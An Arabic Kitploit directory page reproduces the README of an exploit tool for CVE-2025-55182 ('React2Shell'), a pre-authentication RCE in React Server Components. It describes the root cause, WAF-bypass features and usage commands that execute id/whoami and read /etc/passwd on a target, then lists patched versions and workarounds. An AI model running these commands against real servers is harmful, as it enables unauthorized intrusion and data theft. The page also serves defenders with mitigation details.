Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — استغلال RCE قبل المصادقة لـ CVE-2025-55182 (React2Shell) يستهدف مكونات خادم React. يتضمن المسح، التحقق من OAST، تجاوز WAF، تنفيذ الأوامر، وقراءة الملفات. | Kitploit
أدوات/GitHubGitHub/sentinelxofficial/cve-2025-55182
الاستطلاعتحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

استغلال RCE قبل المصادقة لـ CVE-2025-55182 (React2Shell) يستهدف مكونات خادم React. يتضمن المسح، التحقق من OAST، تجاوز WAF، تنفيذ الأوامر، وقراءة الملفات.

عرض المستودع
15منذ 2 أشهرلم تتم المراجعة بعد

CVE-2025-55182 — React2Shell

تنفيذ تعليمات برمجية عن بُعد قبل المصادقة في مكونات خادم React (RSC) و Next.js والأطر ذات الصلة.

CVE CVSS Type Author


نظرة عامة

CVE-2025-55182 (يُشار إليه أيضًا باسم React2Shell) هو ثغرة حرجة من نوع تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة تؤثر على نظام مكونات خادم React (RSC). يمكن لمهاجم غير موثَّق اختراق خادم ضعيف بالكامل من خلال طلب HTTP POST واحد مصمم بعناية.

التحليل الفني

السبب الجذري

تستخدم مكونات خادم React تنسيقًا مخصصًا للأسلاك يُسمى React Flight لتسلسل مراجع الدوال واستدعاءات الوحدات. توجد الثغرة في آلية فك ترميز الحمولة التي تعالج طلبات POST الواردة إلى نقاط نهاية RSC.

عندما يتلقى الخادم حمولة React Flight، فإنه يُفك تسلسل المحتوى دون التحقق الكافي، مع الثقة في حقول $$typeof التي يتحكم بها المهاجم وحل مراجع الوحدات. يسمح هذا للمهاجم بما يلي:

  1. الإشارة إلى وحدات Node.js المدمجة التعسفية (مثل child_process و fs و net)
  2. ربط استدعاءات الدوال عبر علامة النوع $F (دالة)
  3. تنفيذ تعليمات برمجية تعسفية تحت بيئة تشغيل Node.js الخادم

الإصدارات المتأثرة

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


الميزات

  • المسح – كشف نقاط نهاية RSC الضعيفة وتحديد إصدار Next.js/React.
  • التحقق (OAST) – إرسال حمولات خارج النطاق لتأكيد RCE عبر عمليات استرجاع DNS/HTTP.
  • التجاوز – تجاوز شامل لجدران الحماية/IDS: تحوير نوع المحتوى، ترميز الحمولة، تزوير الرأس، تنويع المسار، وحمولات WAF.
  • التنفيذ – تشغيل أوامر نظام تعسفية على الهدف (مثل id، whoami).
  • القراءة – قراءة ملفات تعسفية من الخادم (مثل /etc/passwd، package.json).
  • إخراج JSON – نتائج قابلة للقراءة آليًا للتكامل.

التثبيت

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

الاستخدام

مسح أساسي

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

التحقق من RCE باستخدام OAST

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

اختبار التجاوز الكامل

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

تنفيذ الأوامر

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

قراءة الملفات

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

استخدام وكيل (مثل Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

هيكل الملفات

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

التخفيف

التصحيح (موصى به)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

حلول مؤقتة

· تعطيل وظائف الخادم ("use server") · قواعد WAF لحظر Content-Type: text/x-component · تقسيم الشبكة لنقاط نهاية RSC


المراجع

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


إخلاء مسؤولية: للاختبارات الأمنية المصرح بها فقط.

المؤلف: SentinelX · https://t.me/SentinelXsecurity

تنزيل الأداة
الحزمةالإصدار الضعيفالإصدار المُصحَّح
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (انظر التصحيح)الإصدارات المُصحَّحة